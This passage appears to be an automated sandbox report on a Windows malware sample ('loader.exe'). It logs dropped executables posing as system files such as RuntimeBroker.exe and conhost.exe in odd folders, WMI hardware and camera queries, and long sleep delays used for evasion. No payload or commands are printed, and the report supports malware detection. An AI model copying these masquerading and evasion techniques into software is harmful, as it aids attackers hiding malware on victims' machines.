                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeMemory allocated: DD0000 memory reserve | memory write watchJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeMemory allocated: 1A970000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeMemory allocated: 1950000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeMemory allocated: 1B5A0000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeMemory allocated: 1040000 memory reserve | memory write watch
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeMemory allocated: 1ACF0000 memory reserve | memory write watch
                                    Source: C:\Recovery\conhost.exeMemory allocated: 1420000 memory reserve | memory write watch
                                    Source: C:\Recovery\conhost.exeMemory allocated: 1AF90000 memory reserve | memory write watch
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeMemory allocated: B40000 memory reserve | memory write watch
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeMemory allocated: 1A590000 memory reserve | memory write watch
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeMemory allocated: 1430000 memory reserve | memory write watch
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeMemory allocated: 1B0C0000 memory reserve | memory write watch
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeMemory allocated: 970000 memory reserve | memory write watch
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeMemory allocated: 1A7A0000 memory reserve | memory write watch
                                    Source: C:\Recovery\conhost.exeMemory allocated: F60000 memory reserve | memory write watch
                                    Source: C:\Recovery\conhost.exeMemory allocated: 1ADA0000 memory reserve | memory write watch
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeMemory allocated: A20000 memory reserve | memory write watch
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeMemory allocated: 1A600000 memory reserve | memory write watch
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006CCE52 sldt word ptr [eax]0_2_006CCE52
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 600000Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 599890Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 599703Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 599500Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 3600000Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 599094Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 598407Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 598203Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 597844Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 597485Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 597266Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 597138Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 596875Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 596531Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 595344Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 595047Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 594766Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 594469Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 594110Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 593844Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 593625Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 593328Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 300000Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 592407Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 592094Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 591844Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 591577Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 591297Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 591000Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 590438Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 590203Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 589891Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 589516Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 589233Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 588907Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 588453Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 588061Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 587141Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 586719Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 586313Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 586016Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 585719Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 585453Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 585091Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 584762Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 583985Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 583672Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 583424Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 583297Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 583187Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 583062Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 582953Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 582844Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 582732Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 582625Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 582516Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 582406Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 582297Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 582184Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 582078Jump to behavior
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\conhost.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\conhost.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeWindow / User API: threadDelayed 639Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWindow / User API: threadDelayed 6840Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWindow / User API: threadDelayed 2705Jump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZPhRdffT.logJump to dropped file
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\PHEbWhMM.logJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\SSuSBQke.logJump to dropped file
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\OTzTkTQO.logJump to dropped file
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\pOvooSqL.logJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\BLdnhdFQ.logJump to dropped file
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\kmFpzVgz.logJump to dropped file
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\JgiUHXBa.logJump to dropped file
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\XCTiUwVw.logJump to dropped file
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\keVXUmFt.logJump to dropped file
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe TID: 2264Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 4900Thread sleep time: -30000s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -600000s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -599890s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -599703s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -599500s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 6268Thread sleep time: -3600000s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -599094s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -598407s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -598203s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -597844s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -597485s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -597266s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -597138s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -596875s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -596531s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -595344s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -595047s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -594766s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -594469s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -594110s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -593844s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -593625s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -593328s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 6268Thread sleep time: -300000s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -592407s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -592094s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -591844s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -591577s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -591297s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -591000s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -590438s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -590203s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -589891s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -589516s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -589233s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -588907s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -588453s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -588061s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -587141s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -586719s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -586313s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -586016s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -585719s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -585453s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -585091s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -584762s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -583985s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -583672s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -583424s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -583297s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -583187s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -583062s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -582953s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -582844s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -582732s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -582625s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -582516s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -582406s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -582297s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -582184s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -582078s >= -30000sJump to behavior
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exe TID: 948Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Recovery\conhost.exe TID: 3796Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe TID: 3212Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe TID: 3908Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exe TID: 5648Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Recovery\conhost.exe TID: 7008Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeLast function: Thread delayed
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Recovery\conhost.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Recovery\conhost.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0063A69B FindFirstFileW,FindFirstFileW,0_2_0063A69B
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_04FF6859 NtQueryInformationProcess,GetSystemInfo,0_2_04FF6859
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 30000Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 600000Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 599890Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 599703Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 599500Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 3600000Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 599094Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 598407Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 598203Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 597844Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 597485Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 597266Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 597138Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 596875Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 596531Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 595344Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 595047Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 594766Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 594469Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 594110Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 593844Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 593625Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 593328Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 300000Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 592407Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 592094Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 591844Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 591577Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 591297Jump to behavior
